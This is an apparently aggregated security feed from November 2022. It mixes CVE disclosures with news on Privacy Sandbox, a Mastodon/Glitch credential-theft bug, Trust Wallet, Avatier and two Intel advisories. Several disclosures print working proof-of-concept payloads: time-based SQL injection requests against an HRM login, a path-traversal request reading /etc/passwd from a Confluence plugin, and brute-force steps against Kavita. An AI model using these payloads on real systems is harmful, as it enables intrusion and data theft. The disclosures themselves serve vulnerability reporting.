Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via svg,Users & Contacts.

**Summary**  
hi team,  
I found Stored XSS in upload file svg version 9.0.54156 reported the vulnerability with CVE-2021-41952, in version 9.3.57186 i have bypassed it  
visit : #1 to view my report

**Info**  
Zenario 9.3.57186 last version  
FireFox 105.0.3 (64-bit)  
Chrome 106.0.5249.119

_**I will recreate it again**_  
**Steps**

1.  Login home page >> Choose **Users & Contacts** and create any user
    
2.  Click **Image** >> Upload an image  
    
3.  payload i inject to svg  
    
4.  go to link file inject , paypload executed

CVE-2022-44073: XSS upload file SVG in Zenario 9.3.57186 · Issue #6 · hieuminhnv/Zenario-CMS-last-version

Human Resource Management System v1.0 was discovered to contain a SQL injection vulnerability via the password parameter at /hrm/controller/login.php.

**Human Resource Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Deven

vendors:https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html

Vulnerability File: /hrm/controller/login.php

POST parameter 'password' exists SQL injection vulnerability

Payload1: name=ab&password=cd'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 35
    
    name=ab&password=cd'&submit=Sign+In
    

Payload2: name=ab&password=cd''&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 36
    
    name=ab&password=cd''&submit=Sign+In
    

Payload3: name=ab&password=cd'%2b(select\*from(select(sleep(5)))q)%2b'&submit=Sign+In

    POST /hrm/controller/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=vilo7csum7e88k93vn9tfo8beb
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/hrm/index.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 74
    
    name=ab&password=cd'%2b(select*from(select(sleep(20)))q)%2b'&submit=Sign+In
    

The server response time is 20 seconds

CVE-2022-43262: bug_report/SQLi-1.md at main · null302/bug_report

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.
"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.
To that end, developers will need to complete an enrollment process in order

Internet behemoth Google on Tuesday said it plans to roll out Privacy Sandbox for Android in beta to mobile devices running Android 13 starting early next year.

"The Privacy Sandbox Beta will be available for ad tech and app developers who wish to test the ads-related APIs as part of their solutions," the company said.

To that end, developers will need to complete an enrollment process in order to utilize the ads-related APIs, including Topics, FLEDGE, and Attribution Reporting.

Topics, which replaced Federated Learning of Cohorts (FLoC) earlier this year, aims to categorize user interests under different "topics" based on their device web browsing history. These inferred interests are then shared with marketers to serve targeted ads.

FLEDGE and Attribution reporting, on the other hand, enable custom audience targeting and help measure ad conversions without relying on cross-party user identifiers, respectively.

Organizations can also request access for a limited number of devices to test the Beta, plus register any apps which will utilize the Privacy Sandbox APIs.

The development comes after the search and advertising giant expanded the initiative to include its mobile operating system in February 2022, and followed it up with a developer preview in May 2022.

Privacy Sandbox is an effort led by Google to create a set of web standards for websites to access user information without compromising on privacy. It aims to facilitate online advertising without resorting to invasive methods like third-party tracking cookies or fingerprinting.

That said, the company's plans to turn off third-party cookies in the Chrome web browser have been delayed twice, with the technology now expected to be phased out sometime in the second half of 2024.

To complicate matters further, the proposals have drawn criticism from rival browser vendors like Mozilla Firefox and developers of other Chromium-based browsers such as Brave, Opera, and Vivaldi, who have said the newer methods would cement "Google's position as a web monopolist."

DuckDuckGo, which blocks Privacy Sandbox through its Chrome browser extension as of May 2022, said Topics allows Google to surveil users' online activities and share that information with advertisers for behavioral targeting without their consent.

"This targeting, regardless of how it's done, enables manipulation (ex. exploiting personal vulnerabilities), discrimination (ex. people not seeing job opportunities based on personal profiles), and filter bubbles (ex. creating echo chambers that can divide people) that many people would like to avoid," the company noted.

Despite the pushback, Google said it's looking to engage with the broader ecosystem and gather "continued feedback as we enter this next phase of testing."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google to Roll Out Privacy Sandbox Beta on Android 13 by Early 2023

Patched bug could have leaked credentials

Jessica Haworth 15 November 2022 at 15:39 UTC  
Updated: 15 November 2022 at 15:47 UTC

Patched bug could have leaked credentials

  

Attackers could steal password credentials from Mastodon users due to a vulnerability in Glitch, a fork of Mastodon, a researcher has warned.

Mastodon has risen in popularity in recent weeks, as many users moved to the social media platform as a replacement for Twitter, recently acquired by controversial businessman Elon Musk.

“Everybody on infosec Twitter seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about,” Gareth Heyes, of PortSwigger Research\*, wrote in a blog post released today.

Heyes found he was able to steal users’ stored credentials using Chrome’s autofill feature by tricking them into clicking a malicious element he had disguised as a toolbar.

Read more of the latest news about web security vulnerabilities

  
After discovering that Mastodon allows users to post HTML, Heyes found out from other users that he was able to spoof a blue ‘official’ tick in his username by inputting .

He placed the string inside an anchor text node that was inside the title attribute by doing the following:

Input:

Output:

This allowed Heyes to successfully bypass the HTML filter due to the replacement of the verified placeholder with an image that contained double quotes.

“The filter was completely destroyed as I could just inject arbitrary HTML, but one last thing stood in my way: they used a relatively strict Content Security Policy (CSP),” wrote Heyes.

“Pretty much each resource was limited to infosec.exchange, with the exception of iframes which allowed any HTTPS URL.”

**Spoofed**

Heyes then realised he could inject form elements, allowing him to spoof a password form which, when combined with Chrome autofill, would allow an attacker access to the credentials.

Worse still, the researcher was able to spoof the toolbar below. Where a user clicked on any elements of the spoofed toolbar, it would send their credentials to an attacker's server.

Heyes tested Chrome to see if it would still autofill the credentials when the inputs were invisible. If an attacker used an opacity value of zero, Chrome would still conveniently fill in the credentials.

Due to the CSP, Heyes couldn’t use inline styles. However, looking at the CSS files, he found a class that had “in a couple of seconds”, which “worked perfectly”.

He explained to The Daily Swig: “Add the PoC code into post text area and hit publish – \[the\] user sees \[the\] post and clicks on what they think is a Mastodon toolbar. Credentials are \[then\] sent to an external server.

“In a real attack the credentials will be stored and the user redirected back to the site.”

**Mitigations**

Any Mastodon instance using the Gitch fork of Mastodon is vulnerable, Heyes explained, adding that since the server is vulnerable, “there’s not much a user can do to protect themselves”.

He added: “However, it would be a good idea to only autofill your password with user interaction to prevent credentials from being stolen.”

Heyes reported the bug directly to Glitch. Contributors have released a patch for the issue, which is available on the Glitch repo.

\* PortSwigger Research is the research arm of PortSwigger Ltd, the parent company of The Daily Swig.

YOU MAY ALSO LIKE Google Pixel screen-lock hack earns researcher $70k

Mastodon users vulnerable to password-stealing attacks

By Deeba Ahmed
The extension will support all EVM chains and Solana.
This is a post from HackRead.com Read the original post: Trust Wallet Launches Browser Extension Wallet for Desktop

Binance’s Trust Wallet has launched a new browser extension wallet. The world’s leading multi-chain wallet provider’s brand-new extension for desktops will support all EVM chains and Solana. It will provide an enhanced dApp experience to users as they can explore things beyond CEXs (centralized exchanges).

**Trust’s Browser Extension Wallet Details**

This wallet is compatible with Chrome, Opera, and Brave browsers and syncs with Trust Wallet’s mobile wallet. For your information, Trust’s mobile wallet is one of the best mobile crypto wallets in the world, with over 60 million downloads. It receives ten million active users per month, which indicates its global appeal.

As per Trust Wallet CEO Eowyn Chen, users had been requesting for Browser extension with the same quality of experience as they receive on the Trust Wallet Mobile App, including multi-chain coverage. The company tried to empower users regarding the choice of device when accessing the wallet, which led to the development of the new browser wallet.

“This is our initial step, and we will listen to users’ and developers’ feedback to improve,” Chen noted.

Trust Mobile Wallet features such as multi-wallet support, fiat on-ramp and NFT support, and non-EVM blockchain integrations will be added to the new browser extension apart from unique features like hardware wallet support.

**What’s in it for Users?**

Both mobile and desktop versions of the wallet would offer enhanced Web3 accessibility and a seamless wallet experience across the two environments. It enables users to securely store, send/receive, and manage data easily.

The desktop browser extension wallet would let users receive more than eight million tokens across Solana and all available EVM chains, such as Ethereum, Polygon, BNB Chain, and Avalanche. Users can also custom-add EVM chains. It is worth noting that non-EVMs will also be added in the future.

Furthermore, the wallet extension is expected to improve the multi-chain user experience. With network auto-detect, users will enjoy a seamless dApp experience without manually adding networks. Eight million tokens are available out of the box to ease the demand for the manual addition of tokens and improve asset traceability.

In short, the new browser extension wallet will offer an optimized dApp experience so that users “effectively discover things beyond centralized exchanges (CEXs), like Web3 gaming, metaverse, DeFi, tokens not found on CEX, and more,” the company’s press release explained.

1.  Ankr Launches Chainscanner Blockchain Explorer Tool
2.  Improving privacy – Alternative browsers and chrome extensions
3.  Can This Browser Extension Really Protect You From Cybercrime?

Trust Wallet Launches Browser Extension Wallet for Desktop

In the Netic User Export add-on before 1.3.5 for Atlassian Confluence, authorization is mishandled. An unauthenticated attacker could access files on the remote system.

Vulnerability Type: Unauthenticated Arbitrary File Read

Vendor of Product: Atlassian Confluence

Affected Product Code Base: User Export for Confluence

Product Version: < 1.3.5

Description: The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and download any file from the system.

Attack Type: Remote

Endpoint: /plugins/servlet/confluenceuserexport/admin/download

Assigned CVE-ID: CVE-2022-42977, CVE-2022-42978

Steps To Reproduce

1\. Issue a HTTP POST/GET request to the following endpoint: https://<confluence.example.com>/plugins/servlet/confluenceuserexport/admin/download?fileName=\[file-path\]

#PoC

\[REQUEST\]

GET /plugins/servlet/confluenceuserexport/admin/download?fileName=../../../../../../etc/passwd HTTP/1.1

Host: confluence.example.local

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

\[RESPONSE\]

HTTP/1.1 401

Set-Cookie: JSESSIONID=ABCDEFGHIJKLMNOPQRSTUVWYZ; Path=/; HttpOnly

WWW-Authenticate: OAuth realm="confluence.example.local"

Content-Disposition: attachment; filename=../../../../../etc/os-release

Content-Type: text/html;charset=UTF-8

Content-Length: 407

Not AuthorizedNAME="CentOS Linux"

VERSION="7 (Core)"

ID="centos"

CVE-2022-42978: Unauthenticated Arbitrary File Read

Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.

The migrate-email endpoint is requiring Email, Username, and Password parameter. This endpoint contain authentication functionality that doesn't have any protection from brute-force attack, which allows an attacker to try every possible password combination without any restriction.

**CWE-307: Improper Restriction of Excessive Authentication Attempts****POC****1\. Send this request to Burpsuite Intruder**

    POST /api/account/migrate-email HTTP/1.1
    Host: 192.168.189.132:5000
    Accept: application/json, text/plain, */*
    DNT: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Referer: http://192.168.189.132:5000/admin/dashboard
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
    Connection: close
    Content-Type: application/json
    Content-Length: 67
    
    {"Email":"xxx@local.com",
    "Username":"admin",
    "Password":"xxx"
    }
    

**2\. Mark on the Password value**

**3\. Bruteforce attack with 1000 password list and get valid admin password**

**Impact**

An attacker could perform a brute-force attack targeting normal and administrative users, using different passwords and eventually gain access to the targeted account, without any restriction.

CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita

Designation recognizes highest caliber of information security.

**PLEASANTON, Calif., Nov. 14, 2022 /PRNewswire/** — Avatier, the industry leader in identity and access management, today announced it has received ISO 27001:2013 certification for its Information Security Management System (ISMS).

ISO 27001:2013 is an information security standard published by the International Organization for Standardization (ISO), the world's largest developer of voluntary international standards, and the International Electrotechnical Commission (IEC). Avatier's certification was issued by A-LIGN, an independent and accredited certification body based in the United States, on the successful completion of a formal audit process. This certification is evidence that Avatier has met rigorous international standards in ensuring the confidentiality, integrity, and availability of the Avatier Identity Anywhere platform.

Avatier develops identity management and governance platforms that enable organizations to scale faster, innovate quicker and embrace change more securely. Avatier's identity access management (IAM) and identity governance and administration (IGA) solutions do not require client software, so management is in real-time across any platform, such as Google Chrome, Microsoft Teams, or iOS and Android.

"This certification demonstrates Avatier's continued commitment to information security at every level and ensures our customers that the security of their data and information has been addressed, implemented, and properly controlled in all areas of their organization," said Jeremy Russeau, Avatier CISO.

**About Avatier Corporation**

Avatier is the Identity Management company of the future with innovative solutions for today. Avatier develops a "state of the art" identity management platform enabling workforce collaboration resulting in better customer experiences and increased revenue. The company's Identity Anywhere platform uses container technology, providing maximum flexibility, scalability and security in a platform-independent and portable solution that future-proofs your investment. Avatier's identity management and access governance solutions make the world's largest organizations more secure and productive in the shortest time at the lowest costs. Avatier brings all your back-office business applications and employee assets together and manages them as one.

For more information, visit www.avatier.com.

**SOURCE:** Avatier

Avatier Achieves ISO 27001 Certification for its Information Security Management System

Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® XMM™ 7560 Modem Software Advisory**

Intel ID:

INTEL-SA-00683

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in some Intel® XMM™ 7560 Modem software may allow escalation of privilege.  Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26513

Description: Out-of-bounds write in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 8.0 High

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H

CVEID: CVE-2022-27874

Description: Improper authentication in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-28611

Description: Improper input validation in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H

CVEID: CVE-2022-26369

Description: Out-of-bounds read in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 6.2 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-28126

Description: Improper input validation in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-26367

Description: Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-26079

Description: Improper conditions check in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-27639

Description: Incomplete cleanup in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via adjacent access.

CVSS Base Score: 5.4 Medium

CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-26045

Description: Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2\_7560\_R\_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access.

CVSS Base Score: 3.3 Low

CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:L

**Affected Products:**

Intel® XMM™ 7560 Modem M.2 software for Windows or Linux before version M2\_7560\_R\_01.2146.00.

**Recommendations:**

Intel recommends that users of Intel® XMM™ 7560 Modem M.2 software for Windows or Linux update to the latest version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employee Bharats Chandra.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.  

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26045: INTEL-SA-00683

Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi Advisory**

**Summary: **

A potential security vulnerability in some Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi products may allow denial of service. Intel is releasing a firmware update to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26047

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi  and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

CVSS Base Score: 4.3 Medium

CVSS Vector:  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

Intel® PROSet/Wireless WiFi firmware before version 22.140, Killer™ WiFi firmware before version 3.1122.3158 and UEFI version 2.2.14.22176.2.

**CVE ID**

**Affected Products**

**Affected OS**

CVE-2022-26047

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Windows 10 & 11

Linux

Chrome OS

UEFI

CSME

CVE-2022-26047

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Windows 10 & 11

**Recommendations:**

**Windows:**

Intel recommends updating Intel® PROSet/Wireless WiFi software to version 22.140 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19351/windows-10-and-windows-11-wi-fi-drivers-for-intel-wireless-adapters.html

Intel recommends updating Killer™ WiFi software to version 3.1122.3158 or later.

Updates for Killer™ products are available for download at this location:

https://www.intel.com/content/www/us/en/download/19779/intel-killer-performance-suite.html?wapkw=killer

**UEFI:**

Intel recommends updating Intel® PROSet/Wireless WiFi UEFI drivers to version 2.2.14.22176 or later.

Please contact your OEM support group to obtain the correct driver version.

**Chrome OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed to Chromium by November 08, 2022.

For any Google Chrome OS solution and schedule, please contact Google directly.

**Linux OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed by November 08, 2022.

Consult the regular open-source channels to obtain this update.

**Recommendation for Intel vPRO® CSME WiFi products:**

Intel recommends updating Intel vPRO® CSME WiFi products to the following versions or newer.

**Platform**

**CSME Version**

**Device**

12th Generation Intel® Core Processor

16.1.25.1885v2

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

12th Generation Intel® Core Processor – Performance cores

16.1.25.1865v6.1

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

11th Generation Intel® Core Processor

15.0.42.2235

Intel® Wi-Fi 6 AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

10th Generation Intel® Core Processor

14.1.67.2046

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

ntel® Wi-Fi 6 AX200

9th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

8th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

Intel recommends that users of Intel® vPRO® CSME WiFi products update to the latest version provided by the system manufacturer that addresses these issues.  

**Acknowledgements:**

The following issue was found internally by an Intel employee.  Intel would like to thank Julien Lenoir.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#chrome